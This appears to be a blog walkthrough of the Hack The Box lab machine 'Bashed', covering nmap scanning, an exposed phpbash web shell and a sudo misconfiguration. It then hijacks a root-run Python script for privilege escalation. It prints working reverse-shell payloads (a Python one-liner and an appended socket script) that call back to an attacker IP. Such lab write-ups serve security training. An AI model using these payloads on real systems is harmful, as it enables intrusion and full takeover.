
hack the box walkthrough – Bashed machine
Today new walkthrought about the hack the box machine Bashed.
It is an easy Linux machine released on dec. 2017 made by Arrexel.

Let’s jump it!
enumeration
As usual we start with a nmap enumeration to find out what we are dealing with today:
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.66.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-11 15:58 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.70% done; ETC: 16:01 (0:01:54 remaining)
Nmap scan report for 10.129.66.213
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.57 seconds
It seems we have only an Apache web service running on port 80. Let’s have a look:

Seems a site talking about Arrexel’s dev progress. nothin interresting so far.
Let’s run a dirbuster scan to see if other pages can be found:


I found interresting files in dev folder: phpbash.min.php and phpbash.php. Let’s have a look:

Looks like we already have our shell!
I still prefer the shell with netcat:
nc -lvnp 1337
export RHOST="10.10.14.105";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
FOOTHOLD
Running a command sudo -l I found out I am able to run scriptmanager with sudo:
[email protected]:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
witht he following command I have been able to spaw a shell as scriptmanager:
[email protected]:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
[email protected]:/var/www/html/dev$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
PRIVILEGE ESCALATION
A linpeas enumeration output shows a uncommon folder “scripts” at the root

There are 2 files inside:
[email protected]:/scripts$ ls -al
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 1039 Dec 13 13:41 test.py
-rw-r--r-- 1 root root 8 Dec 13 15:00 test.txt
[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing123!")
f.close
[email protected]:/scripts$ cat test.txt
[email protected]:/scripts$
It appears that the python script is executing by root every minutes to edit the file test.txt
Therefor I edited the script for having a reverse shell
[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing2")
f.close
import socket # For Building TCP Connection
import subprocess # To start the shell in the system
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's'
s.connect(('10.10.14.105', 4242)) # Here we define the Attacker IP and the listening port
while True: # keep receiving commands from the Kali machine
command = s.recv(1024) # read the first KB of the tcp socket
if 'terminate' in command: # if we got terminate order from the attacker, close the socket and break the loop
s.close()
break
else: # otherwise, we pass the received command to a shell process
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read() ) # send back the result
s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error
def main ():
connect()
main()
[email protected]:/scripts$
nc -lvnp 1337
Waiting 1 min… then I am root !
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.42.84] 58776
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)